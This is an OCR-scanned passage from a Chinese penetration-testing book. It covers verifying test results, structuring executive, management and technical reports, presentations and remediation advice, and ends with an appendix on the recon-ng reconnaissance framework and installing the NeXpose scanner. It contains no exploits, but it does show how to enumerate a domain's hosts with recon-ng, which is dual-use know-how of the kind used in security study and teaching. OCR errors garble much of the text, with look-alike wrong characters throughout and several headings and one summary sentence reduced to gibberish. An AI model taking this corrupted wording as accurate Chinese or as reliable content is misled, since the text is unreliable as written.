深度 分 析 被 测 蛙 位 的 信息 系统 ， 这 无 疑 是 汇报 人 员工 作 中 的 一 大 难 反 。 

本 章 的 各 个 小 市 均 能 指导 读者 得 当地 准备 文档 、 汇 报 和 演示 工作 。 
这 些 工 作 的 细微 丝 漏 都 可 能 引发 法 律 问 题 。 报 告 的 观点 必须 与 测试 中 发 
现 的 事实 一 致 。 而 且 ， 指 出 目标 系统 的 潜在 缺陷 只 是 报告 的 基本 作用 ， 
客户 对 报告 的 期 待 往往 更 高 。 例 如 ， 客 户 可 能 和 要求 报告 内 容 能 够 以 已 知 
的 和 规划 规定 为 出 发 点 ， 通 过 具有 次 服 力 的 证 据 进行 问题 滇 示 。 此 外 ， 
还 要 明确 可 用 来 进行 攻击 的 犯罪 手段 、 有 关 工 具 和 技术 ， 列 举 已 发 现 的 
漏洞 并 验证 利用 漏洞 的 可 行 性 。 大 体 上 说 ， 文 档 报告 的 重点 应 当 是 甲 方 
的 安全 脆弱 性 ， 而 不 是 乙方 挖掘 漏洞 的 具体 过 程 或 涉及 漏洞 的 拉 术 现 
象 。 























12.1 文档 记录 与 结果 验证 








在 测试 过 程 中 可 能 会 发 现 很 多 漏洞 ， 但 是 并 非 每 个 漏洞 都 可 被 利 
用 。 要 验证 漏洞 存在 被 攻击 的 可 能 性 ， 本 质 上 说 就 必须 对 大 量 的 漏洞 进 
行 验证 。 验 证 漏洞 是 减少 出 错 的 必要 手段 ， 更 是 关系 到 信誉 和 诚实 形象 
的 重要 工作 。 不 少 人 都会 直接 整 段 复制 扫描 程序 的 扫描 报告 ， 把 那些 文 
字 拼 凑 一 下 就 直接 辐 客 户 交付 。 这 种 做 法 不 仅 不 负责 任 ， 而 且 缺 乏 对 评 
佑 过程 的 必要 控制 ， 最 终 可 能 导致 严重 的 后 果 ， 甚 至 影响 测试 人 员 的 职 
业 生 涯 。 如 果 软 件 的 扫描 结果 存在 假 明 性 问题 ， 会 让 用 户 错 误 地 判断 安 
全 水 平 ， 甚 至 令 他 们 身 陷 危险 。 因 此 ， 必 须 尽 量 排除 错误 ， 消 除 测试 结 
果 之 中 的 各 种 矛盾 ， 力 和 争 保证 测试 数据 的 完整 性 不 受 人 为 因素 的 影响 。 
以 下 的 这 些 工作 方法 ， 有 助 于 测试 人 员 进 行文 档 定 理 并 验证 测试 结果 的 
有 效 性 ， 从 而 帮助 他 们 把 数据 转变 为 真正 的 最 终 报告 。 

e 详细 记录 信息 收集 、 目 标识 别 、 服 务 枚 举 、 漏 洞 映 射 、 社 会 工程 
学 、 漏 调 利 用 、 提 升 权 权 和 访问 维护 各 阶段 的 具体 工作 步骤 。 

e 最 好 给 每 个 将 会 用 到 的 Kali 工具 都 草拟 一 份 笔记 模板 。 这 种 模板 

















应 当 明 确 声明 工具 用 途 、 指 令 选项 、 与 评估 任务 的 关系 ， 并 空 出 留 白 以 
记录 相应 的 测试 结果 。 在 使 用 特定 工具 得 出 某 项 结论 之 前 ， 要 至 少 重复 
这 些 过 程 两 次 ， 以 避免 测试 结果 受 不 可 遇见 因素 的 影响 。 例 如 ， 在 使 用 
Nmap 程 序 进 行 端口 扫描 时 ， 测 试 人 员 应 当 确 定 笔记 模板 中 的 内 容 涵 六 
了 所 有 必要 的 信息 ， 至 少 包 括 : 使 用 目的 、 目 标 主机 、 指 令 选 项 、 相 关 
简介 例如 服务 监测 、 操 作 系 统 类 型 、MAC 地址 、 开 放 端 口 、 设 备 类 
型 等 内 容 ) ， 并 记录 下 相关 程序 的 输出 结果 。 

e 不 要 仅 赁 单一 工具 的 结果 就 草率 地 作出 鉴定 结论 。 过 于 依赖 单一 
工具 《例如 信息 收集 工具 ) 的 做 法 绝对 不 可 取 ， 因 为 那样 可 能 会 给 渗透 
测试 工作 带 来 偏差 甚至 错误 。 所 以 ， 本 书 强烈 建议 您 使 用 不 同 的 工具 进 
行 相同 项 目的 测试 。 这 将 确保 测试 结果 的 有 效 性 ， 提 高 效率 ， 减 少 假 阴 
性 和 假 阳 性 的 偏差 问题 。 换 而 言 之 ， 每 个 工具 都 是 在 特定 环境 下 使 用 的 
有 共有 各 目 专 长 的 程序 。 某 些 实际 情况 下 ， 测 试 人 员 可 能 要 进行 人 工 测 
试 。 总 而 言 之 ， 要 充分 利用 个 人 知识 和 项 目 经 验 验 证 程序 结果 的 有 效 
HE. 

















12.2 报告 的 种 类 


在 验证 过 测试 结果 的 全 部 细 市 之 后 ， 测 试 人 员 要 把 这 些 信息 条 理 分 
明 地 组 合成 结构 清晰 的 书面 报告 ， 最 后 还 要 把 报告 交付 给 利益 相关 者 。 
测试 报告 可 分 为 三 种 类 型 。 每 种 类 型 的 报告 都 有 各 自 的 模式 ， 分 别 侧重 
于 被 测 单位 的 不 同 角 色 人 员 。 这 三 种 报告 分 别 是 : 

e 行政 报告 ; 

e 管理 报告 ; 

e 技术 报告 。 

渗透 测试 人 员 要 根据 阅读 人 员 的 理解 能 力 传递 相应 的 信息 。 本 文 将 
详细 介绍 每 一 种 报告 的 行文 结构 和 基本 要 素 。 然 而 ， 有 具体 内 容 就 需要 测 

















试 人 员 根 据 项 目 目标 自行 芯 酌 了 。 需 要 注意 的 是 ， 在 同 有 关 人 员 交 付 这 
些 报告 之 前 ， 应 当 确 保 这 些 报告 同 他 们 披露 的 信息 与 保密 协议 、 法 律 规 
定 和 渗透 测试 协议 的 要 求 一 致 。 

12.2.1 行 i 


在 各 种 评估 报告 中 ， 行 政 报 告 属 于 较为 简洁 的 报告 。 这 种 报告 应 当 
以 企业 高 层 的 角度 ， 从 业务 战略 的 方面 介绍 渗透 测试 的 作用 。 这 种 报告 
主要 面 对 被 测 单位 C 开 头 的 高 管 (CEO CTO, Co) ， 所 以 必须 具 





d PARE. 
e 项 目 目标 : 有 渗透 测试 人 员 和 被 测 单位 共同 协商 制定 的 评定 准 
则 。 


。 ”漏洞 与 其 风险 等 级 ， 这 部 分 内 容 要 描述 漏洞 的 风险 等 级 〈 关 键 
级 、 高 危 级 、 中 等 风险 、 低 等 风险 级 和 信息 泄露 级 ) 。 风 险 的 等 级 界定 
应 能 划分 并 突出 技术 安全 问题 的 严重 程度 。 

e 执行 摘要 : 人 简明 扼要 地 描述 此 次 渗透 测试 任务 采用 的 方法 论 、 作 
用 和 目标 ， 并 着 重 介绍 漏洞 的 数量 以 及 可 被 利用 的 漏洞 数量 。 

e 漏洞 统计 : 分 类 介绍 目标 网 络 系 统 里 存在 的 漏洞 。 通 常 ， 测 试 人 
员 还 会 以 饼 形 图 或 其 他 简明 易 懂 的 方式 进行 演示 。 

e 风险 矩阵 : 对 以 识别 出 的 漏洞 进行 量化 分 析 和 分 类 总 结 ， 推 肝 可 
能 会 受 风险 影响 的 相关 资源 ， 以 便于 记忆 的 方式 列举 出 此 次 任务 的 友 
现 、 参 考 文献 和 改进 建议 。 

在 草拟 行政 报告 时 ， 最 好 能 够 兼顾 报告 内 容 的 创造 力 和 文字 的 表达 
能 力 。 行 政 报告 并 不 是 以 技术 角度 反映 评估 结果 的 技术 细 市 ， 而 是 要 对 
技术 评 佑 结果 进行 总 结 ， 指 出 它们 对 业务 的 实际 影响 。 一 般 来 说 ， 行 政 
报告 的 篇 幅 应 当 是 2 一 4 页 。 








12.2.2 管理 报告 


管理 报告 通常 讨论 安全 问题 相关 的 法 律 法 规 和 合 规 性 问题 。 这 种 报 
告 通 常 是 对 行政 报告 的 必要 扩充 ， 不 仅 应 能 满足 人 力 资源 和 其 他 管理 层 
人 士 的 工作 和 需要， 而 且 要 从 法 定 程 序 的 角度 分 析 问 题 。 此 类 报告 可 能 需 
要 涉及 以 下 方面 。 

e iM: 报告 首先 应 当 列 举 出 已 知 的 各 种 安全 标准 和 法 律 法 
规 ， 并 指出 它们 与 当前 安全 问题 涉及 的 有 关 法 律 条 球 。 应 当 重 点 突出 已 
经 触及 的 法 律 问题 ， 以 及 企业 可 能 在 不 经 意 间 就 会 面临 的 严重 的 法 律 风 
险 。 

e 测试 方法 : 帮助 管理 层 人 士 理解 渗透 测试 生命 周期 的 简要 介绍 。 

e 假设 与 局 限 性 : 阐述 那些 可 能 影响 渗透 测试 人 员 完 成 特定 目标 的 
己 知 因素 。 

e ”变更 管理 : 某 些 人 可 能 认为 只 有 当 被 测 单位 进行 系统 改进 的 时 
候 ， 测 试 人 员 才 会 涉及 变更 管理 的 工作 。 但 是 ， 在 受 控 的 IT 环境 中 ， 
策略 管理 和 业务 流程 都 涉及 变更 管理 。 测 试 人 员 在 安全 评估 报告 中 提 及 
的 建议 和 推荐 ， 应 当 与 整个 工作 中 地 变化 情况 保持 一 致 ， 以 最 大 程度 的 
减少 意外 事件 给 评估 服务 帝 来 的 负面 影响 。 

e 配置 管理 : 侧重 于 保持 信息 系统 功能 和 性 能 的 一 致 性 。 以 系统 安 
全 的 角度 来 看 ， 每 当 某 个 变更 可 能 影响 目标 环境 〈 硬 件 、 软 件 、 物 理 属 
性 和 其 他 问题 ) 的 时 候 ， 有 关 人 员 就 应 当 随 后 进行 相应 的 配置 管理 。 这 
种 管理 是 对 系统 配置 的 一 种 监控 手段 ， 以 维护 系统 的 配置 状态 。 

一 个 负责 的 专业 渗透 测试 人 员 ， 在 渗透 测试 步 入 任何 环节 之 前 都 会 
器 管理 团队 阐明 情况 。 这 种 沟通 工作 不 仅 涉 及 一 对 一 的 面谈 ， 而 且 要 明 
确 界定 特定 测试 的 评估 标准 。 即 ， 测 试 人 员 要 和 被 测 单位 探讨 评估 时 涉 
及 合 规 化 要 求 、 评 估 采 用 的 标准 框架 ， 确 定 特定 测试 的 实际 限制 ， 判 断 
改进 建议 是 否 对 目标 系统 切实 可 行 ， 了 解 配置 变更 对 当前 系统 状态 的 影 
啊 等 。 所 有 这 些 因素 都 与 目标 环境 的 安全 状态 有 着 和 干 丝 万 缕 的 联系 ， 决 
定 着 技术 安全 评估 人 员 应 当 给 予 什 么 建议 和 意见 。 









































12.2.3 VET: 


被 评估 单位 主要 参照 技术 报告 解决 渗透 测试 时 发 现 的 安全 问题 。 这 
类 报告 主要 面向 技术 人 员 ， 帮 助 他 们 理解 目标 系统 的 核心 安全 问题 。 技 
术 报 告 详细 介绍 各 种 漏洞 、 利 用 漏洞 的 具体 方法 、 安 全 问题 给 业务 珊 来 
的 负面 影响 ， 以 及 针对 这 些 威 胁 的 补救 建议 。 它 得 是 全 面 保护 网 络 系统 
的 安全 防护 指南 。 前 文 介 绍 了 行政 报告 和 管理 报告 的 基本 要 素 。 技 术 报 
告 要 对 这 两 种 报告 进行 补充 说 明 ， 满 足 被 评估 单位 技术 团队 的 各 种 需 
求 。 有 些 情 况 下 ， 技 术 报 告 也 要 包含 前 两 种 报告 中 的 项 目 目标 、 漏 洞 及 
其 风险 等 级 、 风 险 算 阵 、 漏 洞 统 计 、 测 试 方法 和 假设 与 局 限 性 内 容 。 不 
过 ， 技 术 报 告 的 至 少 要 涵盖 以 下 内 容 。 

e 安全 问题 : 技术 报告 应 当 详 细 描述 在 渗透 过 程 中 发 现 的 安全 问题 
和 针对 这 些 漏洞 的 攻击 方法 。 它 应 该 使 用 列表 详尽 描述 受 影 啊 的 资源 范 
图 、 攻 击 后 果 、 测 试 时 的 请 求 和 啊 应 数据 、 模 拟 攻 击 所 使 用 的 请 求 和 啊 
应 数据 、 向 改善 团队 提供 外 部 的 参考 文献 、 列 举 出 可 帮助 被 评估 单位 解 
决 相 关 漏 洞 的 针对 性 的 专业 建议 。 

e 漏洞 映射 : 技术 报告 还 应 当 详 细 列 举 出 每 个 漏洞 的 具体 位 置 ， 通 
过 标识 信息 的 映射 “ 即 参照 信息 ) 帮助 撤 术 人 员 找 到 漏洞 所 在 。 例 如 ， 
IP 地 址 和 相应 主机 的 对 应 关系 融 是 一 种 标识 信息 的 映射 。 

e 利用 程序 映射 : 技术 报告 应 当 列 举 出 测试 人 员 核 对 并 验证 过 的 漏 
洞 利 用 程序 Cexploit) ， 并 且 要 指明 有 关 的 漏洞 利用 程序 是 在 网 络 里 可 
以 找到 的 公开 程序 ， 还 是 不 公开 的 目测 程序 。 如 采 能 够 指出 漏洞 利用 程 
序 的 下 载 地 址 并 说 明 它 的 公开 日 期 ， 那 么 这 份 报告 就 更 有 说 服 力 。 

e 最 佳 实践 : 最 佳 实践 可 指导 有 关 人 员 改 进 在 设计 、 实 施 和 运营 方 
面 的 安全 机 制 。 例 如 ， 大 型 企业 的 IT 环境 通常 部 署 边界 级 别 的 保护 设 
施 ， 以 降低 外 部 入 侵 的 几率 。 最 佳 实践 的 各 种 案例 都 非常 灵活 ， 不 需要 
干预 生产 系统 也 不 需要 改动 原 有 程序 。 



































一 般 来 说 ， 技 术 报告 是 向 被 测 蛙 位 有 关 人 员 如 实 反 映 实际 情况 的 技 
术 文 件 。 技 术 报 告 在 风险 管理 中 的 作用 重大 ， 多 数 情 况 下 都 会 被 用 于 指 
导 安 全 系统 的 改进 工作 。 





因为 渗透 测试 各 有 不 同 ， 所 以 渗透 测试 报告 的 行文 结构 也 灵活 多 
变 。 本 文 提供 了 一 份 以 网 络 为 测试 对 象 的 渗透 测试 报告 ， 读 者 可 以 将 其 
扩展 为 其 他 类 型 《如 Web 应 用 、 防 火场 、 无 线 网 络 等 ) 的 渗透 测试 报 
告 。 渗 透 测 试 报告 不 仅 有 正文 ， 肯 定 还 有 封面 。 应 当 在 报告 封面 里 注 明 
公司 名 称 、 报 告 类 型 、 扫 描 日 期 、 作 者 姓名 、 文 件 修订 号 、 简 短 的 版 权 
声明 和 保密 声明 。 

以 网 络 为 测试 目标 的 渗透 测试 报告 ， 其 正文 部 分 应 当 由 以 下 内 容 组 
成 。 

e 法 律 声 明 (Legal notice) 

e 渗透 测试 协议 《Penetration testing agreement) 





e 简介 (Introduction) 

e 项 目 目标 (Project objective ) 

e 假定 和 限制 (Assumptions and imitations ) 
e 漏洞 的 影响 (Vulnerability risk scale) 
e 执行 摘要 (Executive summary) 

e AKERE (Risk matrix) 

e 测试 方法 〈Testing methodology ) 

e 安全 威胁 (Security threats) 

e 改进 建议 (Recommendations) 

e 漏洞 映射 《Vulnerabilities map) 

e 利用 方法 (Exploits map) 


e 合 规 性 评估 (Compliance assessment? 

e 变更 管理 (Change management) 

e 最 佳 实践 (Best Practices) 

e 附录 (Annexes) 

换 而 言 之 ， 报 告 手写 人 员 要 使 用 明确 的 行文 结构 ， 把 各 种 类 型 的 报 
告 中 的 所 有 信息 整理 为 一 份 单独 的 完整 报告 。 报 告 中 的 这 些 章 又 可 再 度 
细 化 ， 分 为 各 种 节 ， 以 更 为 详尽 地 介绍 各 种 细节 。 例 如 ， 附 录 章 节 可 在 
不 同 小 节 里 分 别 列举 技术 细节 、 分 析 测 斌 过程 、 操 作 日 志 、 各 种 安全 工 
有 具 的 原始 数据 、 研 究 的 详情 、 网 络 资源 的 引用 以 及 术语 表 。 用 户 会 根据 
需要 选择 他 们 要 看 的 报告 类 型 ， 而 测试 人 员 要 根据 这 种 需求 判断 自己 的 
定位 和 作用 ， 然 后 再 开始 进行 渗透 测试 。 











在 现场 演示 之 前 ， 演 示人 员 应 当 实 现 了 解 听 众 的 技术 水 平和 关注 要 
扩 。 一 次 成 功 的 现场 演示 ， 离 不 开 针 对 听众 的 需求 精心 准备 。 大 演讲 内 
容 与 听众 需求 脱 市 ， 演 示 活 动 将 会 招致 听众 的 反感。 现场 演示 主要 为 了 
让 了 昕 众 理解 测试 人 员 在 测试 环 市 中 发 现 的 潜在 风险 因素 。 例 如 ， 行 政 级 
别 的 经 理 可 能 没有 心思 关注 社会 工程 学 攻击 问题 ， 但 是 他 们 可 能 需要 理 
解 安全 的 现状 ， 想 指导 采用 什么 措施 可 以 改善 系统 的 安全 性 。 

里 然 在 准备 演示 资料 和 演示 方法 方面 没有 统一 的 正规 流程 ， 但 是 演 
讲 人 员 还 是 应 当 尽 量 让 听众 中 的 技术 人 员 和 非 技术 人 员 都 能 有 所 收获 。 
估 测 听众 的 技能 水 平 与 了 解 被 测 信息 系统 一 样 ， 都 是 测试 人 员 的 工作 。 
在 现场 演示 中 ， 要 让 听众 像 了 解 他 们 的 关键 资产 那样 了 解 演讲 人 员 的 技 
术 实 力 。 

只 有 客观 地 指出 当前 安全 问题 中 存在 的 缺陷 ， 才 能 保证 现场 演示 不 
失 专 业 水 准 。 一 次 成 功 的 现场 演示 应 当 以 事实 和 现象 为 依据 ， 由 技术 论 























证 得 出 相应 结论 ， 并 要 给 甲 方 负责 改进 的 团队 提供 相应 的 意见 。 演 示 是 
一 种 面对面 的 交流 活动 ， 演 讲 人 员 应 当 事 先 准备 好 文 持 论 点 的 事实 和 数 
据 。 


12.5 测试 的 后 期 流程 


提供 补救 措施 、 改 正 步骤 和 整改 建议 都 是 渗透 测试 后 期 阶段 的 工 
作 。 在 这 些 工作 里 ， 渗 透 测试 人 员 要 担当 被 测 单位 的 改进 顾问 。 因 为 要 
和 大 量 的 技术 人 员 打 交道 ， 所 以 此 时 沟通 能 力 和 网 络 技术 能 力 就 显得 万 
为 重要 。 

此 外 ， 除 非 专门 进行 培训 ， 否 则 目标 人 群 不 可 能 掌握 被 测 单位 IT 系 
统 的 全 部 知识 。 这 种 条 件 下 渗透 测试 人 员 的 工作 很 难 做 ， 他 们 就 需要 与 
有 关 技 术 的 专家 配合 ， 才 能 知道 如 何 修补 各 个 缺陷 。 本 文 提出 几 个 通用 
准则 ， 以 帮助 读者 向 客户 提供 关键 的 改进 建议 。 

。 测 试 报告 要 从 网 络 设计 入 手 ， 并 且 指 出 可 能 利用 漏洞 的 各 种 必 备 
条 件 。 

。 侧重 分 析 安 全 边界 或 数据 中 心 的 保护 方案 ， 力 图 在 安全 威胁 后 台 
服务 器 或 工作 站 之 前 降低 它们 的 数量 。 

e 客户 端 攻击 和 社会 工程 学 攻击 几乎 无 法 避免 。 但 是 对 员工 进行 针 
对 性 的 最 新 对 策 和 安全 意识 培训 ， 至 少 可 以 降低 这 些 攻击 的 危害 。 

e 渗透 测试 人 员 在 提出 每 项 建议 之 前 ， 应 当 进行 额外 的 调查 ， 以 确 
保 他 们 的 建议 不 会 影响 目标 系统 的 功能 。 

。 在 有 必要 部 署 第 三 方 解 决 方案 (IDS/IPS、 防 火 墙 、 内 容 保护 系 
统 、 杀 毒 软件 、IAM 技 术 等 ) 的 时 候 ， 应 当 验 证 这 些 方案 的 有 效 性 和 可 
靠 性 ， 还 要 对 软件 运行 机 制 进行 安全 和 效率 方面 的 优化 。 

。 要 区 别 对 待 不 安全 的 或 面向 公共 提供 网 络 服务 的 ) 网 域 和 安全 
的 网 域 ， 实 施 分 而 治之 的 保护 策略 。 























e 提高 研发 团队 的 安全 水 准 ， 通 过 安全 的 应 用 程序 提高 目标 IT A 
统 的 安全 性 。 应 用 程序 的 安全 评估 、 源 代码 审计 都 可 以 给 整个 企业 带 来 
很 高 的 回报 。 

e 采用 物理 安全 措施 。 可 通过 安全 环境 设计 、 机 械 与 电子 门禁 、 
侵 警 报 系 统 、 闭 路 电视 监控 系统 和 个 人 身份 识别 系统 ， 进 行 多 层次 的 入 
场 控 制 。 

e 定期 更 新 所 有 重要 的 安全 系统 ， 力 求 保证 其 保密 性 、 完 整 性 和 可 





用 性 。 
e. 检测 并 验证 所 有 文件 中 推荐 的 安全 方案 ， 消 除 入 侵 或 漏洞 利用 的 
可 能 性 。 


12.6 AB RE 





AS ee IR SBE EM AR a PD PSE ASR, We I Be 
行 现场 演 示 的 核心 环节 。 本 章 开 头 便 介 绍 了 从 茶 个 工具 中 提取 分 析 结 果 
的 具体 方法 ， 并 强调 了 最 终 的 汇报 不 能 单纯 依赖 单一 工具 的 检测 结果 。 
在 最 终 定 稿 之 前 ， 测 试 人 员 必 须 使 用 上 自 映 经 验 和 有 关 知 识 验 证 测试 结 
果 。 也 就 是 说 ， 测 试 人 员 应 当 能 人 工 验 证 测试 结果 。 本 章 还 介绍 了 不 同 
类 型 的 报告 格式 ， 集 中 讨论 了 从 行政 、 管 理 和 技术 的 方面 撰写 安全 审计 
报告 的 方法 。 此 外 ， 本 文 还 提供 了 一 份 以 网 络 为 对 象 的 渗透 测试 报告 模 
板 ， 读 者 可 在 撰写 报告 的 时 候 参 考 我 们 的 模板 。 接 下 来 ， 本 文 闸 述 了 现 
场 演示 的 价值 和 验证 技术 现象 的 方法 ， 并 介绍 了 向 不 同 职 业 背 景 的 听众 
进行 演示 的 有 关 要 扩 。 

最 后 ， 本 间 还 提供 了 在 渗透 测试 后 期 通用 的 工作 流程 。 读 者 在 问 用 
户 提 供 有 关 补 救 措 施 或 者 改进 建议 的 时 候 ， 可 能 需要 参考 这 部 分 内 容 。 
这 一 节 详 细 阐 述 了 测试 人 员 以 对 方 技术 团队 顾问 的 身份 ， 或 者 以 改进 负 
责 人 的 身份 癌 被 测试 单位 提供 整治 意见 的 方法 。 





附录 A 辅助 工具 
附录 B 关键 资源 


TKA 辅助 工具 


本 章 将 会 通过 以 下 几 个 角度 ， 简 要 介绍 几 款 渗透 测试 的 辅助 工具 。 
e 工具 的 功能 ; 
e 如 果 这 款 工 具 没 有 被 Kali Linux 收录， 本文 也 会 介绍 其 安装 过 





e 应 用 案例 。 

稍 后 介绍 的 部 分 工具 确实 没有 被 Kali Linux 收录 。 要 使 用 这 些 软 
件 ， 束 需要 修改 Kali Linux 的 软件 仓库 配置 文件 /etc/apt/sources.lst， 然 后 
使 用 apt-get 指 令 进 行 下 载 ， 您 还 可 以 从 各 个 工具 的 官方 网 站 下 载 这 些 程 
Fe 

我 们 把 这 些 工 具 大 体 分 为 以 下 几 类 : 

e 信息 侦察 工具 ; 

e 漏洞 扫描 程序 ; 

e Web 应 用 程序 工具 。 

e 网 络 工 具 。 

现在 ， 我 们 就 杀 密 接触 这 些 工 具 吧 ! 

A.1 侦察 工具 

recon-ng 是 一 蒜 帮 助 我 们 进行 信息 侦察 的 程序 。 确 切 的 说 ， 它 是 自 
动 侦察 目标 、 自 动 识别 目标 的 框架 。 如 果 您 就 悉 Metasploit 的 框架 界 
面 ， 您 可 能 就 会 觉得 recon-ng 的 界面 很 顺手 recon-ng 的 界面 模仿 的 就 
是 Metasploit 的 界面 。 

Kali Linux 已 经 安装 了 recon-ng 1.41 版 本 。 喜 欢 党 试 新 版 本 的 读 
者 ， 可 以 从 其 官方 网 站 进行 更 新 : 
https://bitbucket.org/LaNMaSteR53/recon-ng/ overview。 














默认 安装 的 recon-ng 市 有 信息 侦察 和 目标 识别 的 功能 模块 。 对 1.41 
版 recon-ng 的 功能 模块 进行 分 类 统计 ， 可 得 到 以 下 数据 。 

e Recon modules (侦察 模块 ): 65 个 。 

e Discovery modules (识别 模块 ，: 7 个 。 

e Reporting modules (报告 模块 ): 4 个 。 

e Experimental modules (实验 性 模块 ): 1 个 。 

如 需 局 动 recon-ng 程 序 ， 可 使 用 下 述 指令 。 

# recon-ng 

运行 上 述 指令 之 后 ， 您 将 进入 到 recon-ng 框 架 的 提示 符 〈 见 图 
Al) 。 大 体 上 看 ， 它 的 提示 信息 和 Metasploit 界 面 的 提示 信息 十 分 相 
似 。 

















:~# recon-ng 
i Y dy. SAI ENG. _/ E - _/ / / / 
/ / / / / / / / / / 
/ | is. J / / / / / / / / / / / / 
» * J y 7 x Se Bae A XX y = 
" I gu. -F A cà d E". E. ff y. 
[65] Recon modules 
[7] Discovery modules 
[4] Reporting modules 
[1] Experimental modules 
recon-ng > J 


如 需 查 看 recon-ng 文 持 的 各 种 指令 ， 可 以 在 其 提示 符 状 态 下 使 用 
help 指 令 。 这 个 指令 的 运行 结果 如 图 A.2 所 示 。 

在 这 些 指令 中 ， 最 党 用 的 几 个 指令 如 下 所 示 。 

e use 或 load: 加 载 指 定 模 块 。 

o reload: 重新 加 载 所 有 模块 。 

e info: 显示 指定 模块 的 具体 信息 。 

e run: 运行 指定 的 模块 。 


e show: 展现 recon-ng 框架 的 各 种 数据 对 象 。 

e back: 退出 当前 提示 符 的 级 别 。 

show modules 指 令 可 以 列 出 可 供 使 用 的 全 部 模块 。 这 个 指令 的 运行 
结果 如 图 A.3 所 示 。 


recon-ng > help 


Commands (type [help|?] <topic>): 


Exits current prompt level 

Displays the banner 

Exits current prompt level 

Displays this menu 

Displays module information 

Manages framework API keys 

Loads selected module 

Queries the database 

Records commands to a resource file 
Reloads all modules 

Executes commands from a resource file 
Not available 

Searches available modules 

Sets global options 

Executed shell commands 

Shows various framework items 

Loads selected module 





图 A.2 


recon-ng > show modules 


Discovery 


discovery/exploitable/http/dnn_fcklinkgallery 
discovery/exploitable/http/generic restaurantmenu 
discovery/exploitable/http/webwiz rte 
discovery/info disclosure/dns/cache snoop 
discovery/info disclosure/http/backup finder 
discovery/info disclosure/http/google ids 
discovery/info disclosure/http/interesting files 


Experimental 


recon/contacts/enum/http/web/dev diver 
recon/contacts/enum/http/web/namechk 
recon/contacts/enum/http/web/pwnedlist 
recon/contacts/enum/http/web/should change password 
recon/contacts/gather/http/api/jigsaw/point usage 
recon/contacts/gather/http/api/jigsaw/purchase contact 
recon/contacts/gather/http/api/jigsaw/search contacts 
recon/contacts/gather/http/api/linkedin auth 
recon/contacts/gather/http/api/twitter 
recon/contacts/gather/http/api/whois 


图 A.3 
下 述 指令 可 通过 Bing 的 搜索 引擎 ， 收 集 指定 域名 的 各 主机 信息 。 


recon-ng > load recon/hosts/gather/http/web/bing_site 








recon-ng [bing_site] > set domain example.com 

DOMAIN => example.com 

recon-ng [bing site] > run 

[*] URL: http://www.bing.com/search?first=0 & q=site%3A 


example.com 


[*] www.example.com 

[*] leb.example.com 

[*] sos.example.com 

[*] forms.example.com 

[*] bankrobbers.example.com 
[*] vault.example.com 

[*] tips.example.com 

[*] delivery.example.com 

[*] omaha.example.com 

[*] chicago.example.com 

[*] foia.example.com 

[*] 11 total hosts found. 

[*] 11 NEW hosts found! 
然后 ， 我 们 通过 show hosts 指令 查询 前 一 个 指令 的 搜索 结果 。 


recon-ng [bing site] > show hosts 


=--------- + 
host 

longitude | 

---------- + 


| bankrobbers.example.com | 


| chicago.example.com 


delivery.example.com 


| foia.example.com 


forms.example.com 


| leb.example.com 


omaha.example.com 


| sos.example.com 


tips.example.com 


| vault.example.com 


| www.example.com 


[*] 11 rows returned 








上 述 例子 只 是 recon-ng 多 种 功能 的 一 个 例子 。 有 关 它 的 各 种 功能 的 
详细 介绍 ， 还 请 查询 作者 的 官方 网 站 
(https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Home) 。 


A.2 Tad] Fa Fate 


Kali Linux 默认 安装 了 OpenVAS。 虽 然 它 是 一 款 漏 洞 扫 描 程序 ， 但 
是 渗透 测试 人 员 不 能 仅 依 赖 一 款 工具 就 确定 安全 现象 。 我 们 应 当 使 用 多 
款 工 具 获 取 更 为 全 面 和 详实 的 信 ， 





忆 ， 充 分 理解 被 测 信息 系统 的 安全 全 


Sh 

本 节 将 要 介绍 Rapid7 出 品 的 NeXpose 漏洞 扫描 程序 〈 共 享 版 ) 。 

A.2.1 NeXpose 共 享 版 

Rapid7 ”推出 的 NeXpose Vulnerability Scanner Community 
Edition (NeXposeCE) 是 一 天 免费 的 漏洞 扫描 程序 。 它 可 以 与 
Metasploit exploit 框架 整合 。 

NeXpose 共享 版 具有 以 下 特性 : 

e 能 够 扫描 最 多 32 “NIP; 

e 漏洞 数据 库 可 定期 升级 ; 

e 可 指定 风险 评估 的 优先 级 ; 

e 可 为 改进 安全 性 提供 指导 建议 ; 

e 可 与 Metasploit 整合 ; 

e 通过 网 站 Chttp://community.rapid7.com) 提供 共享 版 的 有 关 文 








© 另 于 部 署 ; 

e 可 作为 免费 的 初级 安全 解决 方案 。 

商业 版 的 NeXpose 程 序 具备 更 多 功能 。 例 如 ， 它 对 扫描 的 IP 数 量 没 
有 限制 ， 可 进行 分 布 式 扫描 ， 扫 摘 报 告 更 为 灵活 ， 可 进行 Web 和 数据 库 
应 用 程序 扫描 ， 并 有 专门 的 技术 文 持 服务 。 

NeXpose 由 两 个 部 分 组 成 。 

e NeXpose 扫 描 引 擎 ， 目标 识别 和 检测 漏洞 的 后 台 程 序 。 共 享 版 程 
FRRA—TSIS, RNAS]. 

e NeXpose 安 全 控制 台 : 安全 控制 台 负 贡 与 扫 摘 引擎 互动 ， 以 局 动 
扫描 任务 并 接收 扫 朱 结果。 控制 台 还 配 有 可 配置 、 操 作 扫 描 引 擎 的 Web 
接口 。 

在 初步 了 解 了 NeXpose 共 享 版 的 情况 之 后 ， 我 们 接 下 来 安装 这 个 程 
Fre 








1. 安装 NeXpose 

在 Kali Linux 种 安装 NeXpose 共享 版 的 具体 步骤 如 下 。 

1. 访问 网 址 
http: // www.rapid7.com/products/nexpose/nexposecommunity. jsp 并 下 载 安 
装 程 序 。 您 首先 需要 使 用 工作 E-mail 进行 注册 。 此 后 ， 网 站 会 把 
NeXpose CE 许可 证 密 钥 和 下 载 指南 发 送 给 注册 的 E-mail 地 址 。 

2. 根据 E-mail 里 的 信息 下 载 NeXpose 共 享 版 的 安装 程序 。 本 例 下 载 
的 是 适用 于 64 位 Linux 操 作 系 统 的 安装 程序 
Linux64.bin. 

3. 打开 终端 程序 ， 进 入 下 载 文 件 所 在 目录 。 

4. 然后 通过 下 述 指令 启动 NeXpose 的 安装 程序 。 

# ./NeXposeSetup-Linux64.bin 

屏幕 上 会 显示 NeXpose 的 安装 界面 ， 如 图 A.4 所 示 。 











NeXposeSetup- 





Installer ~ Nexpose E 


» The installer is comparing your system settings to required settings 


x nexpose 


Hardware requirements 

$P Intel 1 Core(s) (9 2,466 MHz processor was detected. 

;*. 2.016 MB RAM was detected. 8,192 MB RAM is recommended. 
Software requirements 
License agreement OS Check 
User details Kernel Check 

SELinux Check 
| P Nexpose is not running. 

Shortcut location Ports and connectivity 

